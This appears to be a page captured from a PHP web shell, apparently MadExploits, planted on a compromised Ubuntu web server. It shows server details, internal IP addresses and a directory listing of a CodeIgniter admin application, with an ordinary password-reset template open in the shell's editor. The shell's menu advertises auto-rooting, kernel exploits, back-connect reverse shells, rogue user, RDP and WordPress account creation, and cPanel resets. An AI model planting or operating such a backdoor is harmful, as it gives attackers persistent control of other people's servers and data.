Linux websever 5.15.0-153-generic #163-Ubuntu SMP Thu Aug 7 16:37:18 UTC 2025 x86_64
Apache/2.4.52 (Ubuntu)
: 192.168.3.70 | : 192.168.1.99
Cant Read [ /etc/named.conf ]
8.1.2-1ubuntu2.23
urlab
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
www /
html /
cai /
application /
views /
admin /
common /
[ HOME SHELL ]
Name
Size
Permission
Action
common-list.php
1.44
KB
-rwxr-x--x
forget-password.php
6.07
KB
-rwxr-x--x
login.php
6.19
KB
-rwxr-x--x
page-header.php
524
B
-rwxr-x--x
profile-content.php
18.09
KB
-rwxr-x--x
profile.php
6.21
KB
-rwxr-x--x
sidebar-left.php
3.83
KB
-rwxr-x--x
sidebar-right.php
546
B
-rwxr-x--x
topbar.php
1.85
KB
-rwxr-x--x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : forget-password.php
<?php defined('BASEPATH') OR exit('No direct script access allowed'); ?> <!doctype html> <html class="fixed"> <head> <!-- Basic --> <meta charset="UTF-8"> <meta name="keywords" content="<?=$this->lang->line('SITE_KEYWORDS');?>" /> <meta name="description" content="<?=$this->lang->line('SITE_DESC');?>"> <meta name="author" content="<?=$this->lang->line('TECH_PARTNER');?>"> <title><?=$this->lang->line('SITE_TITLE');?></title> <!-- Mobile Metas --> <meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=no" /> <!-- Web Fonts --> <link href="http://fonts.googleapis.com/css?family=Open+Sans:300,400,600,700,800|Shadows+Into+Light" rel="stylesheet" type="text/css"> <!-- Vendor CSS --> <link rel="stylesheet" href="<?=$this->config->item('vendor_url');?>bootstrap/css/bootstrap.css" /> <link rel="stylesheet" href="<?=$this->config->item('vendor_url');?>font-awesome/css/font-awesome.css" /> <link rel="stylesheet" href="<?=$this->config->item('vendor_url');?>magnific-popup/magnific-popup.css" /> <link rel="stylesheet" href="<?=$this->config->item('vendor_url');?>pnotify/pnotify.custom.css" /> <!-- Theme CSS --> <link rel="stylesheet" href="<?=$this->config->item('css_url');?>theme.css" /> <!-- Skin CSS --> <link rel="stylesheet" href="<?=$this->config->item('css_url');?>skins/default.css" /> <!-- Theme Custom CSS --> <link rel="stylesheet" href="<?=$this->config->item('css_url');?>theme-custom.css"> <!-- Head Libs --> <script src="<?=$this->config->item('vendor_url');?>modernizr/modernizr.js"></script> </head> <body style=" background-color:#000;background-repeat: no-repeat;background-position: center; background-size:cover;"> <!-- start: page --> <section class="body-sign"> <div class="center-sign"> <a href="/" class="logo pull-left" style="margin-top:-60px !important;"> <img src="<?=$this->config->item('img_url');?>logo.png" height="54" alt="Porto Admin" /> </a> <div class="panel panel-sign"> <div class="panel-body"> <div class="alert alert-info"> <p class="m-none text-semibold h6"><?=$this->lang->line('GL_PWD_CHNG_INS');?></p> </div> <form id="signupForm" class="form-horizontal" action="<?php echo site_url($FrmAction);?>" method="post"> <div class="form-group mb-none"> <div class="input-group"> <input type="email" name="email" id="email" placeholder="<?=$this->lang->line('GL_EMAIL_ADD');?>" value="<?=set_value('email');?>" class="form-control input-lg" required/> <span class="input-group-btn"> <button class="btn btn-primary btn-lg" type="submit"><?=$this->lang->line('BTN_RESET');?>!</button> </span> </div> </div> </form> </div> <ul class="nav nav-tabs nav-justified"> <li class="active"><a data-toggle="tab" class="text-center"><i class="fa fa-eye-slash"> </i><?=$this->lang->line('GL_FRG_PWD');?></a></li> <li><a href="<?=site_url('');?>" class="text-center"><i class="fa fa-sign-in"> </i><?=$this->lang->line('GL_LOG_IN');?></a></li> </ul> </div> <p class="text-center text-muted mt-md mb-md"> <?=$this->lang->line('FOOTER_TAG_LINE');?><br><?=$this->lang->line('FOOTER_TECH_PARTNER');?> <a href="<?=$this->lang->line('TECH_PARTNER_URL');?>" target="_blank"><?=$this->lang->line('TECH_PARTNER');?></a> </p> </div> </section> <!-- end: page --> <!-- Vendor --> <!-- Vendor --> <script src="<?=$this->config->item('vendor_url');?>jquery/jquery.js"></script> <script src="<?=$this->config->item('vendor_url');?>jquery-browser-mobile/jquery.browser.mobile.js"></script> <script src="<?=$this->config->item('vendor_url');?>bootstrap/js/bootstrap.js"></script> <script src="<?=$this->config->item('vendor_url');?>nanoscroller/nanoscroller.js"></script> <script src="<?=$this->config->item('vendor_url');?>bootstrap-datepicker/js/bootstrap-datepicker.js"></script> <!-- Specific Page Vendor --> <script src="<?=$this->config->item('vendor_url');?>pnotify/pnotify.custom.js"></script> <!-- Theme Base, Components and Settings --> <script src="<?=$this->config->item('jvs_url');?>theme.js"></script> <!-- Theme Custom --> <script src="<?=$this->config->item('jvs_url');?>theme.custom.js"></script> <!-- Theme Initialization Files --> <script src="<?=$this->config->item('jvs_url');?>theme.init.js"></script> <script src="<?=$this->config->item('vendor_url');?>jquery-validation/jquery.validate.js"></script> <script> $().ready(function() { // validate signup form on keyup and submit $("#signupForm").validate({ rules: { email: { required: true, email: true } }, messages: { email: { required: "<?=$this->lang->line('GL_EAMIL_ADD_MSG');?>", minlength: "<?=$this->lang->line('GL_EMAIL_VAL_MSG');?>" } } }); }); </script> <!-- Specific Page Vendor --> <script src="<?=$this->config->item('vendor_url');?>pnotify/pnotify.custom.js"></script> <?php if($this->session->flashdata(STATUS_MSG) != '') { ?> <script> (function( $ ) { 'use strict'; var stack_bottomright = {"dir1": "up", "dir2": "left", "firstpos1": 15, "firstpos2": 15}; var notice = new PNotify({ title: '<?=$this->lang->line('GL_FORGOT_PWD');?>', text: '<?=$this->session->flashdata(STATUS_MSG);?>', type: '<?=$this->session->flashdata(STATUS_TYPE);?>', addclass: 'stack-bottomright', stack: {"dir1": "up", "dir2": "left", "firstpos1": 15, "firstpos2": 15} }); }).apply( this, [ jQuery ]); </script> <?php } ?> </body> </html>
Close